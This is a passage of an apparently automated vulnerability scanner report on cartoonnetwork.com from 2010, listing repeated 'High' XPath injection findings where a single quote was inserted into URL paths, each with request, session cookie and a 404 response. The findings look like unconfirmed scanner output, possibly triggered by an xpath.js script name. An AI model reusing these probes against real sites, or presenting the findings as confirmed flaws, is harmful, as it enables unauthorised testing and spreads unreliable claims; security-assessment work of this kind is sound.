Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.59. http://www.cartoonnetwork.com/help/privacy.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /help/privacy.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /help'/privacy.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:32 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.60. http://www.cartoonnetwork.com/help/privacy.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /help/privacy.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /help/privacy.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:34 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.61. http://www.cartoonnetwork.com/help/termsofuse.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /help/termsofuse.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /help'/termsofuse.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:37 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.62. http://www.cartoonnetwork.com/help/termsofuse.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /help/termsofuse.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /help/termsofuse.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:39 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.63. http://www.cartoonnetwork.com/help/trademark.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /help/trademark.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /help'/trademark.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:10 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.64. http://www.cartoonnetwork.com/help/trademark.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /help/trademark.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /help/trademark.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:12 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.65. http://www.cartoonnetwork.com/legal/international.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/international.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal'/international.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:45 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.66. http://www.cartoonnetwork.com/legal/international.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/international.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal/international.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:47 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.67. http://www.cartoonnetwork.com/legal/parentguide.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/parentguide.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal'/parentguide.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:42 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.68. http://www.cartoonnetwork.com/legal/parentguide.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/parentguide.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal/parentguide.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:45 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.69. http://www.cartoonnetwork.com/legal/privacy.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/privacy.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal'/privacy.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:09 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.70. http://www.cartoonnetwork.com/legal/privacy.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/privacy.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal/privacy.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:12 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.71. http://www.cartoonnetwork.com/legal/ratings.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/ratings.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal'/ratings.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:50 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.72. http://www.cartoonnetwork.com/legal/ratings.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/ratings.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal/ratings.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:52 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.73. http://www.cartoonnetwork.com/legal/termsofuse.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/termsofuse.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal'/termsofuse.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:23 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.74. http://www.cartoonnetwork.com/legal/termsofuse.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/termsofuse.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal/termsofuse.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:25 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.75. http://www.cartoonnetwork.com/legal/trademark.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /legal/trademark.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /legal'/trademark.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:34 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
